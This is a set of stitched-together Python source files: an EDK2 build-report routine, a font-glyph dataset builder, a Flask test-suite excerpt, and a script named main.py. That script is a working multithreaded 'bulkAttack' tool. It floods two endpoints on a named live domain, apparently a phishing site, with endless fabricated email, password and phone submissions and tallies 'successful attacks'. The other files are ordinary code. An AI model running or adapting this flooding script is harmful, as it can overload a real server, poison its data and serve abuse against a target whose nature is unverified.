# This function generates report for platform information.
# It comprises of platform summary, global PCD, flash and
# module list sections.
#
# @param self The object pointer
# @param File The file object for report
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen Phase
# @param MakeTime The total time of Make Phase
# @param GenFdsTime The total time of GenFds Phase
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, ReportType):
FileWrite(File, "Platform Summary")
FileWrite(File, "Platform Name: %s" % self.PlatformName)
FileWrite(File, "Platform DSC Path: %s" % self.PlatformDscPath)
FileWrite(File, "Architectures: %s" % self.Architectures)
FileWrite(File, "Tool Chain: %s" % self.ToolChain)
FileWrite(File, "Target: %s" % self.Target)
if GlobalData.gSkuids:
FileWrite(File, "SKUID: %s" % " ".join(GlobalData.gSkuids))
if GlobalData.gDefaultStores:
FileWrite(File, "DefaultStore: %s" % " ".join(GlobalData.gDefaultStores))
FileWrite(File, "Output Path: %s" % self.OutputPath)
FileWrite(File, "Build Environment: %s" % self.BuildEnvironment)
FileWrite(File, "Build Duration: %s" % BuildDuration)
if AutoGenTime:
FileWrite(File, "AutoGen Duration: %s" % AutoGenTime)
if MakeTime:
FileWrite(File, "Make Duration: %s" % MakeTime)
if GenFdsTime:
FileWrite(File, "GenFds Duration: %s" % GenFdsTime)
FileWrite(File, "Report Content: %s" % ", ".join(ReportType))
if GlobalData.MixedPcd:
FileWrite(File, gSectionStart)
FileWrite(File, "The following PCDs use different access methods:")
FileWrite(File, gSectionSep)
for PcdItem in GlobalData.MixedPcd:
FileWrite(File, "%s.%s" % (str(PcdItem[1]), str(PcdItem[0])))
FileWrite(File, gSectionEnd)
if not self._IsModuleBuild:
if "PCD" in ReportType:
self.PcdReport.GenerateReport(File, None)
if "FLASH" in ReportType:
for FdReportListItem in self.FdReportList:
FdReportListItem.GenerateReport(File)
for ModuleReportItem in self.ModuleReportList:
ModuleReportItem.GenerateReport(File, self.PcdReport, self.PredictionReport, self.DepexParser, ReportType)
if not self._IsModuleBuild:
if "EXECUTION_ORDER" in ReportType:
self.PredictionReport.GenerateReport(File, None)
## BuildReport class
#
# This base class contain the routines to collect data and then
# applies certain format to the output report
#
class BuildReport(object):
##
# Constructor function for class BuildReport
#
# This constructor function generates BuildReport object a platform build.
# It generates report for platform summary, flash, global PCDs and detailed
# module information for modules involved in platform build.
#
# @param self The object pointer
# @param ReportFile The file name to save report file
# @param ReportType The kind of report items in the final report file
#
def __init__(self, ReportFile, ReportType):
self.ReportFile = ReportFile
if ReportFile:
self.ReportList = []
self.ReportType = []
if ReportType:
for ReportTypeItem in ReportType:
if ReportTypeItem not in self.ReportType:
self.ReportType.append(ReportTypeItem)
else:
self.ReportType = ["PCD", "LIBRARY", "BUILD_FLAGS", "DEPEX", "HASH", "FLASH", "FIXED_ADDRESS"]
##
# Adds platform report to the list
#
# This function adds a platform report to the final report list.
#
# @param self The object pointer
# @param Wa Workspace context information
# @param MaList The list of modules in the platform build
#
def AddPlatformReport(self, Wa, MaList=None):
if self.ReportFile:
self.ReportList.append((Wa, MaList))
##
# Generates the final report.
#
# This function generates platform build report. It invokes GenerateReport()
# method for every platform report in the list.
#
# @param self The object pointer
# @param BuildDuration The total time to build the modules
# @param AutoGenTime The total time of AutoGen phase
# @param MakeTime The total time of Make phase
# @param GenFdsTime The total time of GenFds phase
#
def GenerateReport(self, BuildDuration, AutoGenTime, MakeTime, GenFdsTime):
if self.ReportFile:
try:
File = []
for (Wa, MaList) in self.ReportList:
PlatformReport(Wa, MaList, self.ReportType).GenerateReport(File, BuildDuration, AutoGenTime, MakeTime, GenFdsTime, self.ReportType)
Content = FileLinesSplit(''.join(File), gLineMaxLength)
SaveFileOnChange(self.ReportFile, Content, False)
EdkLogger.quiet("Build report can be found at %s" % os.path.abspath(self.ReportFile))
except IOError:
EdkLogger.error(None, FILE_WRITE_FAILURE, ExtraData=self.ReportFile)
except:
EdkLogger.error("BuildReport", CODE_ERROR, "Unknown fatal error when generating build report", ExtraData=self.ReportFile, RaiseError=False)
EdkLogger.quiet("(Python %s on %s\n%s)" % (platform.python_version(), sys.platform, traceback.format_exc()))
# This acts like the main() function for the script, unless it is 'import'ed into another script.
if __name__ == '__main__':
pass
|
write_data_to_pkl.py
|
import argparse
import multiprocessing as mp
import os
import pickle
import numpy as np
import svg_utils
'''
{'uni': int64, # unicode value of this glyph
'width': int64, # width of this glyph's viewport (provided by fontforge)
'vwidth': int64, # vertical width of this glyph's viewport
'sfd': binary/str, # glyph, converted to .sfd format, with a single SplineSet
'id': binary/str, # id of this glyph
'binary_fp': binary/str} # font identifier (provided in glyphazzn_urls.txt)
'''
def create_db(opts):
print("Process sfd to pkl files ....")
all_font_ids = sorted(os.listdir(os.path.join(opts.sfd_path, opts.split)))
num_fonts = len(all_font_ids)
print(f"Number {opts.split} fonts before processing", num_fonts)
fonts_per_process = num_fonts // opts.num_processes
char_num = len(opts.alphabet)
def process(process_id):
cur_process_processed_font_glyphs = []
cur_process_log_file = open(os.path.join(opts.log_dir, f'{opts.split}_log_{process_id}.txt'), 'w')
cur_process_pkl_file = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_{process_id:04d}-{opts.num_processes+1:04d}.pkl'), 'wb')
for i in range(process_id * fonts_per_process, (process_id + 1) * fonts_per_process):
if i >= num_fonts:
break
font_id = all_font_ids[i]
cur_font_sfd_dir = os.path.join(opts.sfd_path, opts.split, font_id)
cur_font_glyphs = []
# a whole font as an entry
for char_id in range(char_num):
if not os.path.exists(os.path.join(cur_font_sfd_dir, '{}_{:02d}.sfd'.format(font_id, char_id))):
break
char_desp_f = open(os.path.join(cur_font_sfd_dir, '{}_{:02d}.txt'.format(font_id, char_id)), 'r')
char_desp = char_desp_f.readlines()
sfd_f = open(os.path.join(cur_font_sfd_dir, '{}_{:02d}.sfd'.format(font_id, char_id)), 'r')
sfd = sfd_f.read()
uni = int(char_desp[0].strip())
width = int(char_desp[1].strip())
vwidth = int(char_desp[2].strip())
char_idx = char_desp[3].strip()
font_idx = char_desp[4].strip()
cur_glyph = {}
cur_glyph['uni'] = uni
cur_glyph['width'] = width
cur_glyph['vwidth'] = vwidth
cur_glyph['sfd'] = sfd
cur_glyph['id'] = char_idx
cur_glyph['binary_fp'] = font_idx
if not svg_utils.is_valid_glyph(cur_glyph):
msg = f"font {font_idx}, char {char_idx} is not a valid glyph\n"
cur_process_log_file.write(msg)
char_desp_f.close()
sfd_f.close()
# use the font whose all glyphs are valid
break
pathunibfp = svg_utils.convert_to_path(cur_glyph)
if not svg_utils.is_valid_path(pathunibfp):
msg = f"font {font_idx}, char {char_idx}'s sfd is not a valid path\n"
cur_process_log_file.write(msg)
char_desp_f.close()
sfd_f.close()
break
example = svg_utils.create_example(pathunibfp)
cur_font_glyphs.append(example)
char_desp_f.close()
sfd_f.close()
if len(cur_font_glyphs) == char_num:
# use the font whose all glyphs are valid
# merge the whole font
merged_res = {}
if not os.path.exists(os.path.join(cur_font_sfd_dir, 'imgs.npy')):
rendered = np.zeros((52, opts.img_size, opts.img_size), np.uint8)
rendered[:, :, :] = 255
rendered = rendered.tolist()
else:
rendered = np.load(os.path.join(cur_font_sfd_dir, 'imgs.npy')).tolist()
sequence = []
seq_len = []
binaryfp = []
char_class = []
for char_id in range(char_num):
example = cur_font_glyphs[char_id]
sequence.append(example['sequence'])
seq_len.append(example['seq_len'])
char_class.append(example['class'])
binaryfp = example['binary_fp']
merged_res['rendered'] = rendered
merged_res['seq_len'] = seq_len
merged_res['sequence'] = sequence
merged_res['class'] = char_class
merged_res['binary_fp'] = binaryfp
cur_process_processed_font_glyphs += [merged_res]
pickle.dump(cur_process_processed_font_glyphs, cur_process_pkl_file)
cur_process_pkl_file.close()
processes = [mp.Process(target=process, args=[pid]) for pid in range(opts.num_processes + 1)]
for p in processes:
p.start()
for p in processes:
p.join()
print("Finished processing all sfd files, logs (invalid glyphs and paths) are saved to", opts.log_dir)
def combine_perprocess_pkl_db(opts):
print("Combine all pkl files ....")
all_glyphs = []
all_glyphs_pkl_file = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_all.pkl'), 'wb')
for process_id in range(opts.num_processes + 1):
cur_process_pkl_file = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_{process_id:04d}-{opts.num_processes+1:04d}.pkl'), 'rb')
cur_process_glyphs = pickle.load(cur_process_pkl_file)
all_glyphs += cur_process_glyphs
pickle.dump(all_glyphs, all_glyphs_pkl_file)
all_glyphs_pkl_file.close()
return len(all_glyphs)
def cal_mean_stddev(opts):
print("Calculating all glyphs' mean stddev ....")
all_fonts_f = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_all.pkl'), 'rb')
all_fonts = pickle.load(all_fonts_f)
num_fonts = len(all_fonts)
fonts_per_process = num_fonts // opts.num_processes
char_num = len(opts.alphabet)
manager = mp.Manager()
return_dict = manager.dict()
main_stddev_accum = svg_utils.MeanStddev()
def process(process_id, return_dict):
mean_stddev_accum = svg_utils.MeanStddev()
cur_sum_count = mean_stddev_accum.create_accumulator()
for i in range(process_id * fonts_per_process, (process_id + 1) * fonts_per_process):
if i >= num_fonts:
break
cur_font = all_fonts[i]
for charid in range(char_num):
cur_font_char = {}
cur_font_char['seq_len'] = cur_font['seq_len'][charid]
cur_font_char['sequence'] = cur_font['sequence'][charid]
cur_sum_count = mean_stddev_accum.add_input(cur_sum_count, cur_font_char)
return_dict[process_id] = cur_sum_count
processes = [mp.Process(target=process, args=[pid, return_dict]) for pid in range(opts.num_processes + 1)]
for p in processes:
p.start()
for p in processes:
p.join()
merged_sum_count = main_stddev_accum.merge_accumulators(return_dict.values())
output = main_stddev_accum.extract_output(merged_sum_count)
mean = output['mean']
stdev = output['stddev']
mean = np.concatenate((np.zeros([4]), mean[4:]), axis=0)
stdev = np.concatenate((np.ones([4]), stdev[4:]), axis=0)
# finally, save the mean and stddev files
np.savez(os.path.join(opts.output_path, opts.split, 'mean.npz'), mean)
np.savez(os.path.join(opts.output_path, opts.split, 'stdev.npz'), stdev)
# save_mean_stddev = svg_utils.mean_to_example(output)
# save_mean_stddev_f = open(os.path.join(opts.output_path, opts.split, f'{opts.split}_mean_stddev.pkl'), 'wb')
# pickle.dump(save_mean_stddev, save_mean_stddev_f)
def main():
parser = argparse.ArgumentParser(description="LMDB creation")
parser.add_argument("--alphabet", type=str, default='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz')
parser.add_argument("--ttf_path", type=str, default='font_ttfs')
parser.add_argument('--sfd_path', type=str, default='./font_sfds')
parser.add_argument("--output_path", type=str, default='../data/vecfont_dataset_/',
help="Path to write the database to")
parser.add_argument('--img_size', type=int, default=64)
parser.add_argument("--split", type=str, default='train')
parser.add_argument("--log_dir", type=str, default='./font_sfds/log/')
parser.add_argument("--num_processes", type=int, default=1, help="number of processes") # the real num will be opts.num_processes + 1
parser.add_argument("--phase", type=int, default=0, choices=[0, 1, 2, 3],
help="0 all, 1 create db, 2 combine_pkl_files, 3 cal stddev")
opts = parser.parse_args()
assert os.path.exists(opts.sfd_path), "specified sfd glyphs path does not exist"
split_path = os.path.join(opts.output_path, opts.split)
if not os.path.exists(split_path):
os.makedirs(split_path)
if not os.path.exists(opts.log_dir):
os.makedirs(opts.log_dir)
if opts.phase <= 1:
create_db(opts)
if opts.phase <= 2:
number_saved_glyphs = combine_perprocess_pkl_db(opts)
print(f"Number {opts.split} fonts after processing", number_saved_glyphs)
if opts.phase <= 3:
cal_mean_stddev(opts)
if __name__ == "__main__":
main()
|
main.py
|
import requests, threading, random, string, randominfo
#We will use randominfom package to generate random names, to install run following command -> $ pip install randominfo
#Coded by: Fabian Stevens Varon V.
#Credits - Youtube: https://www.youtube.com/watch?v=StmNWzHbQJU
def randomPhoneNumber():
phoneNumber = []
finalNumber=""
phoneNumber.append(random.randint(3, 3)) # the first number should be in the range of 3 to 3
phoneNumber.append(random.randint(0, 2)) # the second number should be in the range of 0 to 2
for i in range(1, 10): # the for loop is used to append the other 8 numbers.
phoneNumber.append(random.randint(0, 8)) # the other 9 numbers can be in the range of 0 to 8.
# fill the finalNumber variable
for i in phoneNumber:
finalNumber+=str(i)
return finalNumber
#Generate the first part of a fake email
def randomEmailName(gender):
emailName = randominfo.get_first_name(gender)
return emailName
#Generate random password could have special Characters and Numbers
def randomPassword(length,special_chars,digits):
password = randominfo.random_password(length,special_chars,digits)
return password
#Send first request i.e: {'myData': '5277'}
def doRequestTest2(dataTest2):
url= 'https://blitloginnpersons.com/test2.php'
response = requests.post(url, dataTest2).status_code
return response
#Send second request i.e: {'myData': 'Nilam@yahoo.com xD7Cs*!ax | 32842082767'}
def doRequestTest3(dataTest3):
url= 'https://blitloginnpersons.com/test3.php'
response = requests.post(url, dataTest3).status_code
return response
#To create a dynamic 4 digits key --> required by doRequestTest2()
def randomWithNDigits(n):
range_start = 10**(n-1)
range_end = (10**n)-1
return random.randint(range_start, range_end)
if __name__ == "__main__":
def bulkAttack():
successAttacks=0 #To accumulate successfully attacks
while True:
gender = ("male", "female") #To pick between Male & Female
emailLastPart = ("@gmail.com", "@outlook.com", "@yahoo.com", "@hotmail.com") #To create dynamic fake email providers
dynamicKey = randomWithNDigits(4) #To generete 4 digits key
#Creates a fake email calling randomEmailName and adding emailLastPart
email= randomEmailName(gender= random.choice(gender))+random.choice(emailLastPart)
#Creates dynmic password with random "security" levels
password = randomPassword(length=random.randint(8,9), special_chars=bool(random.getrandbits(1)), digits=bool(random.getrandbits(1)))
tel= '| ' + str(randomPhoneNumber()) #Creates a fake Mobile number
dataTest2 = {'myData': f'{dynamicKey}'} #Create dict with Attack2 info
dataTest3 = {'myData': f'{email} {password} {tel}'} #Create dict with Attack3 nfo
print(f"Attack2 info: {dataTest2}") #Control Print
print(f"Attack3 info: {dataTest3}") #Control Print
attackT2= doRequestTest2(dataTest2=dataTest2) #Call attackT2 fun
attackT3= doRequestTest3(dataTest3=dataTest3) #Call attackT2 fun
#If responses are 200 increase the successAttacks count +1
if attackT2 == 200 and attackT3 == 200:
successAttacks+=1
print(f"Successfully Attacks: {successAttacks}") #Control Print
else:
print(f"Error: {attackT2} - {attackT3}")
#Create 50 Threads to send multiple and different request at time.
threads = []
for i in range(50):
t = threading.Thread(target=bulkAttack)
t.daemon = True
threads.append(t)
for i in range(50):
threads[i].start()
for i in range(50):
threads[i].join()
|
basic.py
|
# -*- coding: utf-8 -*-
"""
flask.testsuite.basic
~~~~~~~~~~~~~~~~~~~~~
The basic functionality.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from __future__ import with_statement
import re
import flask
import pickle
import unittest
from datetime import datetime
from threading import Thread
from flask.testsuite import FlaskTestCase, emits_module_deprecation_warning
from werkzeug.exceptions import BadRequest, NotFound
from werkzeug.http import parse_date
from werkzeug.routing import BuildError
class BasicFunctionalityTestCase(FlaskTestCase):
def test_options_work(self):
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
self.assert_equal(rv.data, '')
def test_options_on_multiple_rules(self):
app = flask.Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def index():
return 'Hello World'
@app.route('/', methods=['PUT'])
def index_put():
return 'Aha!'
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST', 'PUT'])
def test_options_handling_disabled(self):
app = flask.Flask(__name__)
def index():
return 'Hello World!'
index.provide_automatic_options = False
app.route('/')(index)
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(rv.status_code, 405)
app = flask.Flask(__name__)
def index2():
return 'Hello World!'
index2.provide_automatic_options = True
app.route('/', methods=['OPTIONS'])(index2)
rv = app.test_client().open('/', method='OPTIONS')
self.assert_equal(sorted(rv.allow), ['OPTIONS'])
def test_request_dispatching(self):
app = flask.Flask(__name__)
@app.route('/')
def index():
return flask.request.method
@app.route('/more', methods=['GET', 'POST'])
def more():
return flask.request.method
c = app.test_client()
self.assert_equal(c.get('/').data, 'GET')
rv = c.post('/')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS'])
rv = c.head('/')
self.assert_equal(rv.status_code, 200)
self.assert_(not rv.data) # head truncates
self.assert_equal(c.post('/more').data, 'POST')
self.assert_equal(c.get('/more').data, 'GET')
rv = c.delete('/more')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
def test_url_mapping(self):
app = flask.Flask(__name__)
def index():
return flask.request.method
def more():
return flask.request.method
app.add_url_rule('/', 'index', index)
app.add_url_rule('/more', 'more', more, methods=['GET', 'POST'])
c = app.test_client()
self.assert_equal(c.get('/').data, 'GET')
rv = c.post('/')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS'])
rv = c.head('/')
self.assert_equal(rv.status_code, 200)
self.assert_(not rv.data) # head truncates
self.assert_equal(c.post('/more').data, 'POST')
self.assert_equal(c.get('/more').data, 'GET')
rv = c.delete('/more')
self.assert_equal(rv.status_code, 405)
self.assert_equal(sorted(rv.allow), ['GET', 'HEAD', 'OPTIONS', 'POST'])
def test_werkzeug_routing(self):
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
def bar():
return 'bar'
def index():
return 'index'
app.view_functions['bar'] = bar
app.view_functions['index'] = index
c = app.test_client()
self.assert_equal(c.get('/foo/').data, 'index')
self.assert_equal(c.get('/foo/bar').data, 'bar')
def test_endpoint_decorator(self):
from werkzeug.routing import Submount, Rule
app = flask.Flask(__name__)
app.url_map.add(Submount('/foo', [
Rule('/bar', endpoint='bar'),
Rule('/', endpoint='index')
]))
@app.endpoint('bar')
def bar():
return 'bar'
@app.endpoint('index')
def index():
return 'index'
c = app.test_client()
self.assert_equal(c.get('/foo/').data, 'index')
self.assert_equal(c.get('/foo/bar').data, 'bar')
def test_session(self):
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/set', methods=['POST'])
def set():
flask.session['value'] = flask.request.form['value']
return 'value set'
@app.route('/get')
def get():
return flask.session['value']
c = app.test_client()
self.assert_equal(c.post('/set', data={'value': '42'}).data, 'value set')
self.assert_equal(c.get('/get').data, '42')
def test_session_using_server_name(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com/')
self.assert_('domain=.example.com' in rv.headers['set-cookie'].lower())
self.assert_('httponly' in rv.headers['set-cookie'].lower())
def test_session_using_server_name_and_port(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='example.com:8080'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
self.assert_('domain=.example.com' in rv.headers['set-cookie'].lower())
self.assert_('httponly' in rv.headers['set-cookie'].lower())
def test_session_using_application_root(self):
class PrefixPathMiddleware(object):
def __init__(self, app, prefix):
self.app = app
self.prefix = prefix
def __call__(self, environ, start_response):
environ['SCRIPT_NAME'] = self.prefix
return self.app(environ, start_response)
app = flask.Flask(__name__)
app.wsgi_app = PrefixPathMiddleware(app.wsgi_app, '/bar')
app.config.update(
SECRET_KEY='foo',
APPLICATION_ROOT='/bar'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://example.com:8080/')
self.assert_('path=/bar' in rv.headers['set-cookie'].lower())
def test_session_using_session_settings(self):
app = flask.Flask(__name__)
app.config.update(
SECRET_KEY='foo',
SERVER_NAME='www.example.com:8080',
APPLICATION_ROOT='/test',
SESSION_COOKIE_DOMAIN='.example.com',
SESSION_COOKIE_HTTPONLY=False,
SESSION_COOKIE_SECURE=True,
SESSION_COOKIE_PATH='/'
)
@app.route('/')
def index():
flask.session['testing'] = 42
return 'Hello World'
rv = app.test_client().get('/', 'http://www.example.com:8080/test/')
cookie = rv.headers['set-cookie'].lower()
self.assert_('domain=.example.com' in cookie)
self.assert_('path=/;' in cookie)
self.assert_('secure' in cookie)
self.assert_('httponly' not in cookie)
def test_missing_session(self):
app = flask.Flask(__name__)
def expect_exception(f, *args, **kwargs):
try:
f(*args, **kwargs)
except RuntimeError, e:
self.assert_(e.args and 'session is unavailable' in e.args[0])
else:
self.assert_(False, 'expected exception')
with app.test_request_context():
self.assert_(flask.session.get('missing_key') is None)
expect_exception(flask.session.__setitem__, 'foo', 42)
expect_exception(flask.session.pop, 'foo')
def test_session_expiration(self):
permanent = True
app = flask.Flask(__name__)
app.secret_key = 'testkey'
@app.route('/')
def index():
flask.session['test'] = 42
flask.session.permanent = permanent
return ''
@app.route('/test')
def test():
return unicode(flask.session.permanent)
client = app.test_client()
rv = client.get('/')
self.assert_('set-cookie' in rv.headers)
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
expires = parse_date(match.group())
expected = datetime.utcnow() + app.permanent_session_lifetime
self.assert_equal(expires.year, expected.year)
self.assert_equal(expires.month, expected.month)
self.assert_equal(expires.day, expected.day)
rv = client.get('/test')
self.assert_equal(rv.data, 'True')
permanent = False
rv = app.test_client().get('/')
self.assert_('set-cookie' in rv.headers)
match = re.search(r'\bexpires=([^;]+)', rv.headers['set-cookie'])
self.assert_(match is None)
def test_session_stored_last(self):
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
@app.after_request
def modify_session(response):
flask.session['foo'] = 42
return response
@app.route('/')
def dump_session_contents():
return repr(flask.session.get('foo'))
c = app.test_client()
self.assert_equal(c.get('/').data, 'None')
self.assert_equal(c.get('/').data, '42')
def test_session_special_types(self):
app = flask.Flask(__name__)
app.secret_key = 'development-key'
app.testing = True
now = datetime.utcnow().replace(microsecond=0)
@app.after_request
def modify_session(response):
flask.session['m'] = flask.Markup('Hello!')
flask.session['dt'] = now
flask.session['t'] = (1, 2, 3)
return response
@app.route('/')
def dump_session_contents():
return pickle.dumps(dict(flask.session))
c = app.test_client()
c.get('/')
rv = pickle.loads(c.get('/').data)
self.assert_equal(rv['m'], flask.Markup('Hello!'))
self.assert_equal(type(rv['m']), flask.Markup)
self.assert_equal(rv['dt'], now)
self.assert_equal(rv['t'], (1, 2, 3))
def test_flashes(self):
app = flask.Flask(__name__)
app.secret_key = 'testkey'
with app.test_request_context():
self.assert_(not flask.session.modified)
flask.flash('Zap')
flask.session.modified = False
flask.flash('Zip')
self.assert_(flask.session.modified)
self.assert_equal(list(flask.get_flashed_messages()), ['Zap', 'Zip'])
def test_extended_flashing(self):
# Be sure app.testing=True below, else tests can fail silently.
#
# Specifically, if app.testing is not set to True, the AssertionErrors
# in the view functions will cause a 500 response to the test client
# instead of propagating exceptions.
app = flask.Flask(__name__)
app.secret_key = 'testkey'
app.testing = True
@app.route('/')
def index():
flask.flash(u'Hello World')
flask.flash(u'Hello World', 'error')
flask.flash(flask.Markup(u'<em>Testing</em>'), 'warning')
return ''
@app.route('/test/')
def test():
messages = flask.get_flashed_messages()
self.assert_equal(len(messages), 3)
self.assert_equal(messages[0], u'Hello World')
self.assert_equal(messages[1], u'Hello World')
self.assert_equal(messages[2], flask.Markup(u'<em>Testing</em>'))
return ''
@app.route('/test_with_categories/')
def test_with_categories():
messages = flask.get_flashed_messages(with_categories=True)
self.assert_equal(len(messages), 3)
self.assert_equal(messages[0], ('message', u'Hello World'))
self.assert_equal(messages[1], ('error', u'Hello World'))
self.assert_equal(messages[2], ('warning', flask.Markup(u'<em>Testing</em>')))
return ''
@app.route('/test_filter/')
def test_filter():
messages = flask.get_flashed_messages(category_filter=['message'], with_categories=True)
self.assert_equal(len(messages), 1)
self.assert_equal(messages[0], ('message', u'Hello World'))
return ''
@app.route('/test_filters/')
def test_filters():
messages = flask.get_flashed_messages(category_filter=['message', 'warning'], with_categories=True)
self.assert_equal(len(messages), 2)
self.assert_equal(messages[0], ('message', u'Hello World'))
self.assert_equal(messages[1], ('warning', flask.Markup(u'<em>Testing</em>')))
return ''
@app.route('/test_filters_without_returning_categories/')
def test_filters2():
messages = flask.get_flashed_messages(category_filter=['message', 'warning'])
self.assert_equal(len(messages), 2)
self.assert_equal(messages[0], u'Hello World')
self.assert_equal(messages[1], flask.Markup(u'<em>Testing</em>'))
return ''
# Create new test client on each test to clean flashed messages.
c = app.test_client()
c.get('/')
c.get('/test/')
c = app.test_client()
c.get('/')
c.get('/test_with_categories/')
c = app.test_client()
c.get('/')
c.get('/test_filter/')
c = app.test_client()
c.get('/')
c.get('/test_filters/')
c = app.test_client()
c.get('/')
c.get('/test_filters_without_returning_categories/')
def test_request_processing(self):
app = flask.Flask(__name__)
evts = []
@app.before_request
def before_request():
evts.append('before')
@app.after_request
def after_request(response):
response.data += '|after'
evts.append('after')
return response
@app.route('/')
def index():
self.assert_('before' in evts)
self.assert_('after' not in evts)
return 'request'
self.assert_('after' not in evts)
rv = app.test_client().get('/').data
self.assert_('after' in evts)
self.assert_equal(rv, 'request|after')
def test_after_request_processing(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/')
def index():
@flask.after_this_request
def foo(response):
response.headers['X-Foo'] = 'a header'
return response
return 'Test'
c = app.test_client()
resp = c.get('/')
self.assertEqual(resp.status_code, 200)
self.assertEqual(resp.headers['X-Foo'], 'a header')
def test_teardown_request_handler(self):
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 200)
self.assert_('Response' in rv.data)
self.assert_equal(len(called), 1)
def test_teardown_request_handler_debug_mode(self):
called = []
app = flask.Flask(__name__)
app.testing = True
@app.teardown_request
def teardown_request(exc):
called.append(True)
return "Ignored"
@app.route('/')
def root():
return "Response"
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 200)
self.assert_('Response' in rv.data)
self.assert_equal(len(called), 1)
def test_teardown_request_handler_error(self):
called = []
app = flask.Flask(__name__)
@app.teardown_request
def teardown_request1(exc):
self.assert_equal(type(exc), ZeroDivisionError)
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError
except:
pass
@app.teardown_request
def teardown_request2(exc):
self.assert_equal(type(exc), ZeroDivisionError)
called.append(True)
# This raises a new error and blows away sys.exc_info(), so we can
# test that all teardown_requests get passed the same original
# exception.
try:
raise TypeError
except:
pass
@app.route('/')
def fails():
1/0
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 500)
self.assert_('Internal Server Error' in rv.data)
self.assert_equal(len(called), 2)
def test_before_after_request_order(self):
called = []
app = flask.Flask(__name__)
@app.before_request
def before1():
called.append(1)
@app.before_request
def before2():
called.append(2)
@app.after_request
def after1(response):
called.append(4)
return response
@app.after_request
def after2(response):
called.append(3)
return response
@app.teardown_request
def finish1(exc):
called.append(6)
@app.teardown_request
def finish2(exc):
called.append(5)
@app.route('/')
def index():
return '42'
rv = app.test_client().get('/')
self.assert_equal(rv.data, '42')
self.assert_equal(called, [1, 2, 3, 4, 5, 6])
def test_error_handling(self):
app = flask.Flask(__name__)
@app.errorhandler(404)
def not_found(e):
return 'not found', 404
@app.errorhandler(500)
def internal_server_error(e):
return 'internal server error', 500
@app.route('/')
def index():
flask.abort(404)
@app.route('/error')
def error():
1 // 0
c = app.test_client()
rv = c.get('/')
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, 'not found')
rv = c.get('/error')
self.assert_equal(rv.status_code, 500)
self.assert_equal('internal server error', rv.data)
def test_before_request_and_routing_errors(self):
app = flask.Flask(__name__)
@app.before_request
def attach_something():
flask.g.something = 'value'
@app.errorhandler(404)
def return_something(error):
return flask.g.something, 404
rv = app.test_client().get('/')
self.assert_equal(rv.status_code, 404)
self.assert_equal(rv.data, 'value')
def test_user_error_handling(self):
class MyException(Exception):
pass
app = flask.Flask(__name__)
@app.errorhandler(MyException)
def handle_my_exception(e):
self.assert_(isinstance(e, MyException))
return '42'
@app.route('/')
def index():
raise MyException()
c = app.test_client()
self.assert_equal(c.get('/').data, '42')
def test_trapping_of_bad_request_key_errors(self):
app = flask.Flask(__name__)
app.testing = True
@app.route('/fail')
def fail():
flask.request.form['missing_key']
c = app.test_client()
self.assert_equal(c.get('/fail').status_code, 400)
app.config['TRAP_BAD_REQUEST_ERRORS'] = True
c = app.test_client()
try:
c.get('/fail')
except KeyError, e:
self.assert_(isinstance(e, BadRequest))
else:
self.fail('Expected exception')
def test_trapping_of_all_http_exceptions(self):
app = flask.Flask(__name__)
app.testing = True
app.config['TRAP_HTTP_EXCEPTIONS'] = True
@app.route('/fail')
def fail():
flask.abort(404)
c = app.test_client()
try:
c.get('/fail')
except NotFound, e:
pass
else:
self.fail('Expected exception')
def test_enctype_debug_helper(self):
from flask.debughelpers import DebugFilesKeyError
app = flask.Flask(__name__)
app.debug = True
@app.route('/fail', methods=['POST'])
def index():
return flask.request.files['foo'].filename
# with statement is important because we leave an exception on the
# stack otherwise and we want to ensure that this is not the case
# to not negatively affect other tests.
with app.test_client() as c:
try:
c.post('/fail', data={'foo': 'index.txt'})
except DebugFilesKeyError, e:
self.assert_('no file contents were transmitted' in str(e))
self.assert_('This was submitted: "index.txt"' in str(e))
else:
self.fail('Expected exception')
def test_teardown_on_pop(self):
